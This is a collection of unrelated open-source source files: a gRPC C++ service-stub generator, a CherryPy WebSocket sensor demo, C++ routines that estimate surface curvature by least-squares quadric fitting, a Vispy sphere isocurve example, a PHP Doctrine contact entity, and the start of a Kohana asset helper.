void PrintSourceService(google::protobuf::io::Printer *printer,
                        const google::protobuf::ServiceDescriptor *service,
                        std::map<std::string, std::string> *vars) {
  (*vars)["Service"] = service->name();
  // Fully qualified method paths: "/<Package><Service>/<Method>".
  printer->Print(*vars, "static const char* $Service$_method_names[] = {\n");
  for (int i = 0; i < service->method_count(); ++i) {
    (*vars)["Method"] = service->method(i)->name();
    printer->Print(*vars, "  \"/$Package$$Service$/$Method$\",\n");
  }
  printer->Print(*vars, "};\n\n");
  // Stub factory binding a new Stub to the given channel.
  printer->Print(
      *vars,
      "std::unique_ptr< $Service$::Stub> $Service$::NewStub("
      "const std::shared_ptr< ::grpc::ChannelInterface>& channel) {\n"
      "  std::unique_ptr< $Service$::Stub> stub(new $Service$::Stub());\n"
      "  stub->set_channel(channel);\n"
      "  return stub;\n"
      "}\n\n");
  // $Idx$ selects the method-name table entry inside each stub body.
  for (int i = 0; i < service->method_count(); ++i) {
    (*vars)["Idx"] = as_string(i);
    PrintSourceClientMethod(printer, service->method(i), vars);
  }
  (*vars)["MethodCount"] = as_string(service->method_count());
  printer->Print(
      *vars,
      "$Service$::AsyncService::AsyncService(::grpc::CompletionQueue* cq) : "
      "::grpc::AsynchronousService(cq, $Service$_method_names, $MethodCount$) "
      "{}\n\n");
  printer->Print(*vars,
                 "$Service$::Service::~Service() {\n"
                 "  delete service_;\n"
                 "}\n\n");
  for (int i = 0; i < service->method_count(); ++i) {
    (*vars)["Idx"] = as_string(i);
    PrintSourceServerMethod(printer, service->method(i), vars);
    PrintSourceServerAsyncMethod(printer, service->method(i), vars);
  }
  // service(): build the RpcService dispatch table once and cache it.
  printer->Print(*vars,
                 "::grpc::RpcService* $Service$::Service::service() {\n");
  printer->Indent();
  printer->Print(
      "if (service_ != nullptr) {\n"
      "  return service_;\n"
      "}\n");
  printer->Print("service_ = new ::grpc::RpcService();\n");
  for (int i = 0; i < service->method_count(); ++i) {
    const google::protobuf::MethodDescriptor *method = service->method(i);
    (*vars)["Idx"] = as_string(i);
    (*vars)["Method"] = method->name();
    (*vars)["Request"] =
        grpc_cpp_generator::ClassName(method->input_type(), true);
    (*vars)["Response"] =
        grpc_cpp_generator::ClassName(method->output_type(), true);
    // Register a handler of the matching streaming type, binding the
    // virtual Service method through a std::function.
    if (NoStreaming(method)) {
      printer->Print(
          *vars,
          "service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
          "    $Service$_method_names[$Idx$],\n"
          "    ::grpc::RpcMethod::NORMAL_RPC,\n"
          "    new ::grpc::RpcMethodHandler< $Service$::Service, $Request$, "
          "$Response$>(\n"
          "        std::function< ::grpc::Status($Service$::Service*, "
          "::grpc::ServerContext*, const $Request$*, $Response$*)>("
          "&$Service$::Service::$Method$), this),\n"
          "    new $Request$, new $Response$));\n");
    } else if (ClientOnlyStreaming(method)) {
      printer->Print(
          *vars,
          "service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
          "    $Service$_method_names[$Idx$],\n"
          "    ::grpc::RpcMethod::CLIENT_STREAMING,\n"
          "    new ::grpc::ClientStreamingHandler< "
          "$Service$::Service, $Request$, $Response$>(\n"
          "        std::function< ::grpc::Status($Service$::Service*, "
          "::grpc::ServerContext*, "
          "::grpc::ServerReader< $Request$>*, $Response$*)>("
          "&$Service$::Service::$Method$), this),\n"
          "    new $Request$, new $Response$));\n");
    } else if (ServerOnlyStreaming(method)) {
      printer->Print(
          *vars,
          "service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
          "    $Service$_method_names[$Idx$],\n"
          "    ::grpc::RpcMethod::SERVER_STREAMING,\n"
          "    new ::grpc::ServerStreamingHandler< "
          "$Service$::Service, $Request$, $Response$>(\n"
          "        std::function< ::grpc::Status($Service$::Service*, "
          "::grpc::ServerContext*, "
          "const $Request$*, ::grpc::ServerWriter< $Response$>*)>("
          "&$Service$::Service::$Method$), this),\n"
          "    new $Request$, new $Response$));\n");
    } else if (BidiStreaming(method)) {
      printer->Print(
          *vars,
          "service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
          "    $Service$_method_names[$Idx$],\n"
          "    ::grpc::RpcMethod::BIDI_STREAMING,\n"
          "    new ::grpc::BidiStreamingHandler< "
          "$Service$::Service, $Request$, $Response$>(\n"
          "        std::function< ::grpc::Status($Service$::Service*, "
          "::grpc::ServerContext*, "
          "::grpc::ServerReaderWriter< $Response$, $Request$>*)>("
          "&$Service$::Service::$Method$), this),\n"
          "    new $Request$, new $Response$));\n");
    }
  }
  printer->Print("return service_;\n");
  printer->Outdent();
  printer->Print("}\n\n");
}
// Renders the .cc-file text for every service declared in |file| and
// returns the accumulated string.
std::string GetSourceServices(const google::protobuf::FileDescriptor *file) {
  std::string generated;
  google::protobuf::io::StringOutputStream out(&generated);
  google::protobuf::io::Printer printer(&out, '$');
  std::map<std::string, std::string> vars;
  // "Package" is either empty or ends with a dot, so it can be
  // concatenated directly in front of the service name when building
  // fully qualified method paths.
  vars["Package"] = file->package();
  if (!file->package().empty()) {
    vars["Package"].append(".");
  }
  const int num_services = file->service_count();
  for (int idx = 0; idx < num_services; ++idx) {
    PrintSourceService(&printer, file->service(idx), &vars);
    printer.Print("\n");
  }
  return generated;
}
} // namespace grpc_cpp_generator
| chenbaihu/grpc | src/compiler/cpp_generator.cc | C++ | bsd-3-clause | 30,007 |
# -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.server.handler.threadedhandler import WebSocketHandler, EchoWebSocketHandler
class BroadcastWebSocketHandler(WebSocketHandler):
    """WebSocket handler that republishes every received message on the
    CherryPy engine bus 'websocket-broadcast' channel (presumably fanned
    out to all connected sockets by the subscribed WebSocketPlugin —
    confirm against ws4py's plugin implementation)."""

    def received_message(self, m):
        # str(m) extracts the message payload before publishing.
        cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
    """CherryPy application root: serves the demo page and exposes the
    websocket upgrade endpoint."""

    @cherrypy.expose
    def index(self):
        """Return the static HTML page that opens a websocket (via
        droidsensor.js) and draws incoming sensor data on a canvas.
        The markup is served verbatim."""
        return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="/js/jquery-1.6.2.min.js"> </script>
<script type="application/javascript" src="/js/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
    """

    @cherrypy.expose
    def ws(self):
        """Endpoint hit for the websocket handshake.  The upgrade itself
        is presumably performed by the WebSocketTool configured for /ws
        (confirm); by the time this runs, the handler already exists and
        is only logged here."""
        cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
    # Global server settings: listen on all interfaces, port 9000, and
    # anchor tools.staticdir.root at ./static next to this script.
    cherrypy.config.update({
        'server.socket_host': '0.0.0.0',
        'server.socket_port': 9000,
        'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
        }
    )
    # Log the static root actually configured above.  The original joined
    # __file__ itself (not its directory) with 'static', printing a path
    # that never exists; it also used the Python 2 print statement —
    # print() with a single argument behaves identically on Python 2 and
    # keeps the file parseable on Python 3.
    print(os.path.abspath(os.path.join(os.path.dirname(__file__), 'static')))
    # Register the websocket machinery: the engine plugin manages socket
    # lifecycles, the tool performs the HTTP upgrade on /ws.
    WebSocketPlugin(cherrypy.engine).subscribe()
    cherrypy.tools.websocket = WebSocketTool()
    cherrypy.quickstart(Root(), '', config={
        '/js': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': 'js'
        },
        '/css': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': 'css'
        },
        '/images': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': 'images'
        },
        '/ws': {
            'tools.websocket.on': True,
            'tools.websocket.handler_cls': BroadcastWebSocketHandler
        }
    }
    )
| progrium/WebSocket-for-Python | example/droid_sensor_cherrypy_server.py | Python | bsd-3-clause | 2,324 |
// File: curvature.cc
// Abstract: determine curvature of surface points on binary volume
//
// ref. Tracing Surfaces for Surfacing Traces
// Sander & Zucker
//
// ref. Surface Parameterization and Curvature Measurement
// of Arbitrary 3-D Objects: Five Pratical Methods
// Stokely and Wu, PAMI vol. 14, 1992
//
// Created: 02/24/98 by: Chris L. Wyatt
// Modified: 10/09/2001 by: Hong Li
//
//
#include "curvature.hh"
#include <fstream>
#include <cstdio>
#ifndef NDEBUG
#define NDEBUG
#endif
#include "constant.h"
//Before using the function, check the normal vector validity
// Estimates local surface curvature at |vert| by least-squares fitting
// the quadratic patch z = a*x^2 + 2b*xy + c*y^2 to the neighbour points
// |nblist|, after rotating the vertex normal onto the +z axis (rotate
// about z by -Az, then about y by -Ay).  Outputs: |cond| = condition
// number of the 3x3 normal-equation matrix, |g| = 4*(a*c - b*b)
// (Gaussian-curvature term), |m| = a + c (mean-curvature term).  When
// |DB| == 1 a set of debug mesh/OFF/VECT files is written.
// NOTE(review): the debug section is guarded by "#ifdef NDEBUG" while
// the top of this file force-defines NDEBUG, so it always compiles in —
// the guard looks inverted relative to the usual NDEBUG convention;
// confirm intent.
// Fix: the function is declared int but previously flowed off the end
// without returning a value (undefined behavior); it now returns 0.
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *>
nblist, double &cond, int DB, Volume_ext<unsigned short> & volume_ext, float
&g, float & m)
{
   std::slist<Vertex_with_Features *>::iterator nbiter;
   int i;
   double Ay, Az, dx, dy, dz;
   double sum11, sum12, sum13, sum22, sum23, sum33;
   double a, b, c;
   mvVec3f ip;
   mvVec3f neighbors[MAX_NEIGHBORS];
   double **ATA, **ATAInv;
   int numn = 0;
   // Rotate the normal onto the z axis; the same rotations are applied
   // to each neighbour so the fit is done in the tangent frame.
   mvVec3f norm = vert.getNormDir();
   Az = gzangle(norm);
   norm = (norm.zRotate(-Az));
   Ay = gyangle(norm);
   norm = (norm.yRotate(-Ay));
   nbiter = nblist.begin();
   while(nbiter != nblist.end())
     {
        // Neighbour position relative to |vert|, expressed in the
        // rotated (tangent-plane) frame.
        ip.x = -vert.getPX()+ (*nbiter)->getPX();
        ip.y = -vert.getPY()+ (*nbiter)->getPY();
        ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
        ip = (ip.zRotate(-Az));
        ip = (ip.yRotate(-Ay));
        neighbors[numn++] = ip;
        nbiter++;
     }
   // Build the normal equations A^T A for the quadratic fit.
   ATA = matrix<double>(1, 3, 1, 3);
   ATAInv = matrix<double>(1, 3, 1, 3);
   sum11 = 0; sum12 = 0; sum13 = 0;
   sum22 = 0; sum23 = 0; sum33 = 0;
   for (i=0; i<numn; i++){
      dx = (double)neighbors[i].x;
      dy = (double)neighbors[i].y;
      sum11 += dx*dx*dx*dx;
      sum12 += dx*dx*2*dx*dy;
      sum13 += dx*dx*dy*dy;
      sum22 += 2*dx*dy*2*dx*dy;
      sum23 += 2*dx*dy*dy*dy;
      sum33 += dy*dy*dy*dy;
   }
   ATA[1][1] = sum11;
   ATA[1][2] = sum12;
   ATA[1][3] = sum13;
   ATA[2][1] = sum12;
   ATA[2][2] = sum22;
   ATA[2][3] = sum23;
   ATA[3][1] = sum13;
   ATA[3][2] = sum23;
   ATA[3][3] = sum33;
   // Pseudo-inverse via SVD; |cond| reports the conditioning.
   invertMatrixSVD(ATA, ATAInv, 3, cond);
   // A^T z for the right-hand side.
   sum11 = sum12 = sum13 = 0;
   for (i=0; i<numn; i++){
      dx = (double)neighbors[i].x;
      dy = (double)neighbors[i].y;
      dz = (double)neighbors[i].z;
      sum11 += dx*dx*dz;
      sum12 += 2*dx*dy*dz;
      sum13 += dy*dy*dz;
   }
   // Solve for the patch coefficients.
   a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
   b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
   c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
#ifdef NDEBUG
   // Debug dump of the local neighbourhood and sampled cut planes.
   if (DB ==1)
     {
        ofstream outfile, outfile1, outfile2,outfile3, outfile4;
        char sout[80];
        outfile1.open ("mesh1.off", ofstream::out | ofstream::app);
        cout<<numn<<endl;
        for (i=0; i<numn; i++){
           sprintf(sout, "%f %f %f ",neighbors[i].x,
                   neighbors[i].y,neighbors[i].z);
           outfile1<<sout<<endl;
        }
        cout << " a = "<< a <<" b = "<< b << " c = "<< c <<endl;
        // NOTE: these float dy/dz shadow the outer double dy/dz above.
        float dy = 0.25; //mm
        float dz = 0.25; //mm
        outfile2.open ("mesh2.mesh"); //transforemed mesh
        outfile2 <<"CMESH" <<endl;
        outfile2 <<"200 200" <<endl;
        outfile3.open ("mesh3.mesh"); //untransformed mesh
        outfile3 <<"CMESH" <<endl;
        outfile3 <<"200 200" <<endl;
        float x,y,z,v;
        //	float xorig, yorig, zorig, xs,ys,zs;
        //	volume_ext.getOrigin(xorig,yorig,zorig);
        //	volume_ext.getVoxelSpacing(xs,ys,zs);
        //	cout << "xo= "<<xorig<<" yo= "<<yorig<<" zo= "<<zorig<<
        //	  "dx = "<<xs<<" dy= "<<ys<<" dz = "<<zs<<endl;
        //	xorig = yorig=xorig = 0; //for start in voxel
        mvVec3f temp;
        for (i = -100; i< 100; i++)
          {
             for (int j=-100;j<100;j++)
               {
                  outfile2<< "0 "<< j*dy << " " <<i*dz<<" 1 0 0 1 ";
                  // Map the sample point back to world space.
                  temp = mvVec3f(0, j*dy, i*dz);
                  temp = temp.yRotate(Ay);
                  temp = temp.zRotate(Az);
                  x = vert.getPX()+temp.x;
                  y = vert.getPY()+temp.y;
                  z = vert.getPZ()+temp.z;
                  v = volume_ext.getValue(x,y,z);
                  //cout <<"v = "<<v<<endl;
                  if (v>=1500) v = 1;
                  else v = v/1500;
                  outfile3<< x << " "<<y << " " <<z<<" "<<v<<" "<<v<<" "<<v<<" 1 ";
               }
             outfile2<<endl;
             outfile3<<endl;
          }
        // Draw a short tangent segment at the estimated surface point.
        temp = temp.crossProduct( vert.getNormDir());
        mvVec3f parallel = (vert.getNormDir()).crossProduct(temp);
        parallel.normalize();
        outfile4.open ("stop.vect"); //untransformed mesh
        outfile4 <<"VECT" <<endl;
        outfile4 <<"1 2 1"<<endl;
        outfile4 <<"2"<<endl;
        outfile4 <<"1"<<endl;
        x = vert.getPX();
        y = vert.getPY();
        z = vert.getPZ();
        mvVec3f curv = mvVec3f(x,y,z);
        temp = vert.getNormDir();
        curv = curv + temp * vert.getThickness();
        /*float tempv = volume_ext.getValue(curv.x,curv.y,curv.z);
        int turn = 0;
        for (i = 0; i < 100; i++)
          {
             curv += temp * 0.25;
             v = volume_ext.getValue(curv.x,curv.y,curv.z);
             if ( v - 1024 > 60)
               {
                  cout << v <<" Larger than 60 at "<< i*0.25 <<" mm" <<endl;
                  break;
               }
             if ( turn ==1 && v-1024 < -425)
               {
                  cout << v <<" Lower than -425 at "<< i*0.25 <<" mm"<<endl;
                  break;
               }
             if ( turn == 1 && v > tempv)
               {
                  cout << "turning at "<< i*0.25 <<" mm" <<endl;
                  break;
               }
             if ( v < tempv) turn = 1;
             tempv = v;
          }*/
        mvVec3f from = curv - parallel * 2;
        mvVec3f to = curv + parallel * 2;
        outfile4 <<from.x <<" "<<from.y<<" "<<from.z<<" "<<
          to.x<<" "<<to.y<<" "<<to.z<<endl;
        outfile4 <<"1 1 0 1"<<endl;
        outfile1.close();
        outfile2.close();
        outfile3.close();
        outfile4.close();
     }
#endif
   free_matrix(ATA, 1, 3, 1, 3);
   free_matrix(ATAInv, 1, 3, 1, 3);
   g= 4*(a*c - b*b);
   m= a + c;
   return 0;  // Success; no error paths are defined.
}
//Before using the function, check the normal vector validity
// Overload without the debug/volume parameters: fits the quadratic
// patch z = a*x^2 + 2b*xy + c*y^2 to the neighbours of |vert| in its
// tangent frame and outputs |g| = 4*(a*c - b*b) and |m| = a + c.
// The SVD condition number is computed but discarded here.
// Fix: the function is declared int but previously flowed off the end
// without returning a value (undefined behavior); it now returns 0.
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *> nblist, float &g, float & m)
{
   std::slist<Vertex_with_Features *>::iterator nbiter;
   int i;
   double Ay, Az, dx, dy, dz;
   double sum11, sum12, sum13, sum22, sum23, sum33;
   double a, b, c;
   mvVec3f ip;
   mvVec3f neighbors[MAX_NEIGHBORS];
   double **ATA, **ATAInv;
   double cond;
   int numn = 0;
   // Rotate the normal onto the z axis (tangent-plane frame).
   mvVec3f norm = vert.getNormDir();
   Az = gzangle(norm);
   norm = (norm.zRotate(-Az));
   Ay = gyangle(norm);
   norm = (norm.yRotate(-Ay));
   nbiter = nblist.begin();
   while(nbiter != nblist.end())
     {
        ip.x = -vert.getPX()+ (*nbiter)->getPX();
        ip.y = -vert.getPY()+ (*nbiter)->getPY();
        ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
        ip = (ip.zRotate(-Az));
        ip = (ip.yRotate(-Ay));
        neighbors[numn++] = ip;
        nbiter++;
     }
   // Normal equations A^T A for the least-squares quadratic fit.
   ATA = matrix<double>(1, 3, 1, 3);
   ATAInv = matrix<double>(1, 3, 1, 3);
   sum11 = 0; sum12 = 0; sum13 = 0;
   sum22 = 0; sum23 = 0; sum33 = 0;
   for (i=0; i<numn; i++){
      dx = (double)neighbors[i].x;
      dy = (double)neighbors[i].y;
      sum11 += dx*dx*dx*dx;
      sum12 += dx*dx*2*dx*dy;
      sum13 += dx*dx*dy*dy;
      sum22 += 2*dx*dy*2*dx*dy;
      sum23 += 2*dx*dy*dy*dy;
      sum33 += dy*dy*dy*dy;
   }
   ATA[1][1] = sum11;
   ATA[1][2] = sum12;
   ATA[1][3] = sum13;
   ATA[2][1] = sum12;
   ATA[2][2] = sum22;
   ATA[2][3] = sum23;
   ATA[3][1] = sum13;
   ATA[3][2] = sum23;
   ATA[3][3] = sum33;
   // Pseudo-inverse via SVD; cond is computed but unused here.
   invertMatrixSVD(ATA, ATAInv, 3, cond);
   sum11 = sum12 = sum13 = 0;
   for (i=0; i<numn; i++){
      dx = (double)neighbors[i].x;
      dy = (double)neighbors[i].y;
      dz = (double)neighbors[i].z;
      sum11 += dx*dx*dz;
      sum12 += 2*dx*dy*dz;
      sum13 += dy*dy*dz;
   }
   // Patch coefficients.
   a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
   b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
   c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
   free_matrix(ATA, 1, 3, 1, 3);
   free_matrix(ATAInv, 1, 3, 1, 3);
   g= 4*(a*c - b*b);
   m= a + c;
   return 0;  // Success; no error paths are defined.
}
//Before using the function, check the normal vector validity.
//This form of curvature is calculated based on vertex list, a given center,
//and a given normal direction; the output is gaussian (g), mean (m), and the
//two principal curvatures, plus the quadric coefficients (a, b, c), the
//rotation angles (Ay, Az) and, if 'trans' is non-NULL, the full 4x4
//world-to-local transform written row-major into trans[16].
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *>
			  nblist, mvVec3f norm, float &g, float & m, float & maxPrinciple, float
			  & minPrinciple, double & a, double & b, double & c, double & Ay, double & Az, double * trans)
{
	std::slist<Vertex_with_Features *>::iterator nbiter;
	int i;
	double dx, dy, dz;
	double sum11, sum12, sum13, sum22, sum23, sum33;
	mvVec3f ip;
	mvVec3f neighbors[MAX_NEIGHBORS];
	double **ATA, **ATAInv;
	double cond;
	int numn = 0;
	double R1[4][4];
	double R2[4][4];
	double T[4][4], Temp[4][4];
	// Rotation angles that align the supplied normal with the +z axis.
	Az = gzangle(norm);
	norm = (norm.zRotate(-Az));
	Ay = gyangle(norm);
	norm = (norm.yRotate(-Ay));
	if( trans !=NULL)
	{
		/* The transform is trans*X = X'; trans = R1(y) * R2(z) * Translation,
		   matching the zRotate-then-yRotate order applied to the neighbor
		   points below (the code multiplies R1*R2, i.e. Ry*Rz). */
		/* R1 rotates about y:
		   [ cos(Ay)  0  sin(Ay)  0
		     0        1  0        0
		     -sin(Ay) 0  cos(Ay)  0
		     0        0  0        1] */
		R1[0][0] = cos(-Ay), R1[0][1]=0, R1[0][2] = sin(-Ay), R1[0][3] = 0;
		R1[1][0] = 0, R1[1][1]=1, R1[1][2] = 0, R1[1][3] = 0;
		R1[2][0] = -sin(-Ay), R1[2][1]=0, R1[2][2] = cos(-Ay), R1[2][3] = 0;
		R1[3][0] = 0, R1[3][1]=0, R1[3][2] = 0, R1[3][3] = 1;
		/* R2 rotates about z:
		   [ cos(Az) -sin(Az)  0  0
		     sin(Az)  cos(Az)  0  0
		     0        0        1  0
		     0        0        0  1] */
		R2[0][0] = cos(-Az), R2[0][1]=-sin(-Az), R2[0][2] = 0, R2[0][3] = 0;
		R2[1][0] = sin(-Az), R2[1][1]=cos(-Az), R2[1][2] = 0, R2[1][3] = 0;
		R2[2][0] = 0, R2[2][1]=0, R2[2][2] = 1, R2[2][3] = 0;
		R2[3][0] = 0, R2[3][1]=0, R2[3][2] = 0, R2[3][3] = 1;
		/* Translation that moves the vertex to the origin:
		   [ 1 0 0 -xs
		     0 1 0 -ys
		     0 0 1 -zs
		     0 0 0  1] */
		T[0][0] = 1, T[0][1]=0, T[0][2] = 0, T[0][3] = -vert.getPX();
		T[1][0] = 0, T[1][1]=1, T[1][2] = 0, T[1][3] = -vert.getPY();
		T[2][0] = 0, T[2][1]=0, T[2][2] = 1, T[2][3] = -vert.getPZ();
		T[3][0] = 0, T[3][1]=0, T[3][2] = 0, T[3][3] = 1;
		/* Temp = R1 * R2 */
		for (int i =0; i < 4 ; i++)
		{
			for (int j = 0; j < 4; j++)
			{
				Temp[i][j] = 0;
				for (int k = 0; k < 4; k++)
					Temp[i][j] += R1[i][k]*R2[k][j] ;
			}
		}
		/* trans = Temp * T, written row-major into the caller's buffer */
		double * result;
		result = trans;
		for (int i =0; i < 4 ; i++)
		{
			for (int j = 0; j < 4; j++)
			{
				*result = 0;
				for (int k = 0; k < 4; k++)
					* result += Temp[i][k]*T[k][j] ;
				result ++;
			}
		}
	}
	// Express every neighbor relative to the vertex, in the rotated frame.
	nbiter = nblist.begin();
	while(nbiter != nblist.end())
	{
		ip.x = -vert.getPX()+ (*nbiter)->getPX();
		ip.y = -vert.getPY()+ (*nbiter)->getPY();
		ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
		ip = (ip.zRotate(-Az));
		ip = (ip.yRotate(-Ay));
		neighbors[numn++] = ip;  // NOTE(review): no bound check against MAX_NEIGHBORS
		nbiter++;
	}
	// Normal equations A^T*A for the quadric z = a*x^2 + 2*b*x*y + c*y^2.
	ATA = matrix<double>(1, 3, 1, 3);
	ATAInv = matrix<double>(1, 3, 1, 3);
	sum11 = 0; sum12 = 0; sum13 = 0;
	sum22 = 0; sum23 = 0; sum33 = 0;
	for (i=0; i<numn; i++){
		dx = (double)neighbors[i].x;
		dy = (double)neighbors[i].y;
		sum11 += dx*dx*dx*dx;
		sum12 += dx*dx*2*dx*dy;
		sum13 += dx*dx*dy*dy;
		sum22 += 2*dx*dy*2*dx*dy;
		sum23 += 2*dx*dy*dy*dy;
		sum33 += dy*dy*dy*dy;
	}
	ATA[1][1] = sum11;
	ATA[1][2] = sum12;
	ATA[1][3] = sum13;
	ATA[2][1] = sum12;
	ATA[2][2] = sum22;
	ATA[2][3] = sum23;
	ATA[3][1] = sum13;
	ATA[3][2] = sum23;
	ATA[3][3] = sum33;
	// SVD-based inverse; 'cond' receives the condition number.
	invertMatrixSVD(ATA, ATAInv, 3, cond);
	// Right-hand side A^T*z.
	sum11 = sum12 = sum13 = 0;
	for (i=0; i<numn; i++){
		dx = (double)neighbors[i].x;
		dy = (double)neighbors[i].y;
		dz = (double)neighbors[i].z;
		sum11 += dx*dx*dz;
		sum12 += 2*dx*dy*dz;
		sum13 += dy*dy*dz;
	}
	a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
	b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
	c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
	free_matrix(ATA, 1, 3, 1, 3);
	free_matrix(ATAInv, 1, 3, 1, 3);
	g= 4*(a*c - b*b);
	m= a + c;
	// NOTE(review): m*m - g may be slightly negative due to round-off,
	// producing NaN principal curvatures; consider clamping to 0.
	float k1 = m+sqrt(m*m-g);
	float k2 = m-sqrt(m*m-g);
	maxPrinciple = max(k1,k2);
	minPrinciple = min(k1,k2);
	return 0;  // FIX: function is declared int but previously fell off the end (undefined behavior)
}
// Angle of the vector's projection onto the y-z plane, measured about
// the x axis (atan2 of z over y), in radians.
double gxangle(mvVec3f p)
{
	return atan2(p.z, p.y);
}
// Angle of the vector's projection onto the z-x plane, measured about
// the y axis (atan2 of x over z), in radians.
double gyangle(mvVec3f p)
{
	return atan2(p.x, p.z);
}
// Angle of the vector's projection onto the x-y plane, measured about
// the z axis (atan2 of y over x), in radians.
double gzangle(mvVec3f p)
{
	return atan2(p.y, p.x);
}
| clwyatt/CTC | Reference/HongLi/src/capd/curvature.cc | C++ | bsd-3-clause | 12,147 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
This example demonstrates isocurve for triangular mesh with vertex data.
"""
import numpy as np
from vispy import app, scene
from vispy.geometry.generation import create_sphere
import sys
# Create a canvas with a 3D viewport
canvas = scene.SceneCanvas(keys='interactive',
                           title='Isocurve for Triangular Mesh Example')
canvas.show()
view = canvas.central_widget.add_view()
# Sphere tessellation resolution (cols x rows) and its radius.
cols = 10
rows = 10
radius = 2
# Number of isolines drawn between the two poles.
nbr_level = 20
mesh = create_sphere(cols, rows, radius=radius)
vertices = mesh.get_vertices()
tris = mesh.get_faces()
# Isoline levels: evenly spaced z-values strictly inside (-radius, radius);
# the [1:-1] slice drops the two endpoint (pole) levels.
cl = np.linspace(-radius, radius, nbr_level+2)[1:-1]
# Draw isolines of the vertices' z coordinate over the triangulated sphere.
scene.visuals.Isoline(vertices=vertices, tris=tris, data=vertices[:, 2],
                      levels=cl, color_lev='winter', parent=view.scene)
# Add a 3D axis to keep us oriented
scene.visuals.XYZAxis(parent=view.scene)
view.camera = scene.TurntableCamera()
view.camera.set_range((-1, 1), (-1, 1), (-1, 1))
# Start the event loop only when the script is run non-interactively.
if __name__ == '__main__' and sys.flags.interactive == 0:
    app.run()
| Eric89GXL/vispy | examples/basics/scene/isocurve_for_trisurface.py | Python | bsd-3-clause | 1,317 |
<?php
namespace EmailMarketing\Domain\Entity;
use Doctrine\Common\Collections\ArrayCollection;
use Doctrine\Common\Collections\Collection;
class Contato
{
    /** @var int|null Surrogate identifier. */
    private $id;

    /** @var string|null Contact display name. */
    private $nome;

    /** @var string|null Contact e-mail address. */
    private $email;

    /** @var Collection Tags attached to this contact. */
    private $tags;

    public function __construct()
    {
        $this->tags = new ArrayCollection();
    }

    public function getTags(): Collection
    {
        return $this->tags;
    }

    /**
     * Attach every tag in $tags, keeping both sides of the
     * many-to-many association in sync.
     *
     * @return $this
     */
    public function addTags(\Doctrine\Common\Collections\Collection $tags)
    {
        foreach ($tags as $tag) {
            $tag->getContatos()->add($this);
            $this->tags->add($tag);
        }
        return $this;
    }

    /**
     * Detach every tag in $tags, keeping both sides of the
     * many-to-many association in sync.
     *
     * @return $this
     */
    public function removeTags(\Doctrine\Common\Collections\Collection $tags)
    {
        foreach ($tags as $tag) {
            // FIX: was "removeEelement" (typo) — a fatal undefined-method
            // error the first time tags were removed from a contact.
            $tag->getContatos()->removeElement($this);
            $this->tags->removeElement($tag);
        }
        return $this;
    }

    public function getId()
    {
        return $this->id;
    }

    public function getNome()
    {
        return $this->nome;
    }

    public function getEmail()
    {
        return $this->email;
    }

    public function setId(int $id)
    {
        $this->id = $id;
        return $this;
    }

    public function setNome(string $nome)
    {
        $this->nome = $nome;
        return $this;
    }

    public function setEmail(string $email)
    {
        $this->email = $email;
        return $this;
    }
}
| adaoex/email-marketing | src/EmailMarketing/Domain/Entity/Contato.php | PHP | bsd-3-clause | 1,436 |
<?php defined('SYSPATH') or die('No direct script access.');
abstract class Kohana_UI {

    /**
     * Render the mashed asset tags (CSS or JS) for a page from the
     * Masher config, using the 3.0 HTML helpers
     * (http://kohanaframework.org/3.0/guide/api/HTML).
     *
     *     // Emit the footer javascript tags for $page
     *     UI::masher('footer', 'js', $page);
     *
     * @author Michael Dyer
     * @param  string $location header|footer (kept for API compatibility;
     *                          it did not affect the output in the original
     *                          implementation either)
     * @param  string $type     css|js
     * @param  string $page     page key inside masher.config
     * @return string           concatenated <link>/<script> tags
     */
    public static function masher($location, $type, $page)
    {
        // The previous version built an elaborate header/footer scaffold,
        // pushed the whole config entry into slot [0] and then iterated that
        // slot — functionally identical to iterating the config entry
        // directly, so the dead structure has been removed.
        $masher = Kohana::$config->load('masher');
        $str = '';
        foreach ($masher[$page][$type] as $asset) {
            $str .= ($type == 'css') ? HTML::style($asset) : HTML::script($asset);
        }
        return $str;
    }

    /**
     * Build an anchor tag whose href is prefixed with a CDN base path
     * from defaults.config.
     *
     *     UI::link($base, $content, $attributes);
     *
